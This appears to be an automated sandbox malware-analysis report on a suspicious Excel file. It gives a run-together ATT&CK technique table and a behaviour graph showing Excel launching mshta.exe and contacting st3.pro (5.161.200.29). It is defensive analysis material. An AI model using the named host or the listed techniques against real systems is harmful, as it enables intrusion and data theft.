Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		Logon Script (Windows)1
Process Injection		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Bootkit		LSA Secrets2
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634262 Sample: COTA#U00c7#U00c3O.xls Startdate: 10/03/2025 Architecture: WINDOWS Score: 56 23 star-azurefd-prod.trafficmanager.net 2->23 25 st3.pro 2->25 27 15 other IPs or domains 2->27 35 Multi AV Scanner detection for submitted file 2->35 37 Document exploit detected (process start blacklist hit) 2->37 39 Sigma detected: Suspicious Microsoft Office Child Process 2->39 8 EXCEL.EXE 504 64 2->8         started        11 EXCEL.EXE 66 33 2->11         started        signatures3 process4 dnsIp5 29 s-part-0048.t-0009.t-msedge.net 13.107.246.76, 443, 49943, 49944 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->29 31 st3.pro 5.161.200.29, 443, 49937 HETZNER-ASDE Germany 8->31 33 2 other IPs or domains 8->33 13 WerFault.exe 17 13 8->13         started        15 splwow64.exe 1 8->15         started        17 mshta.exe 8->17         started        19 WerFault.exe 2 8->19         started        process6 process7 21 EXCEL.EXE 33 65 13->21         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.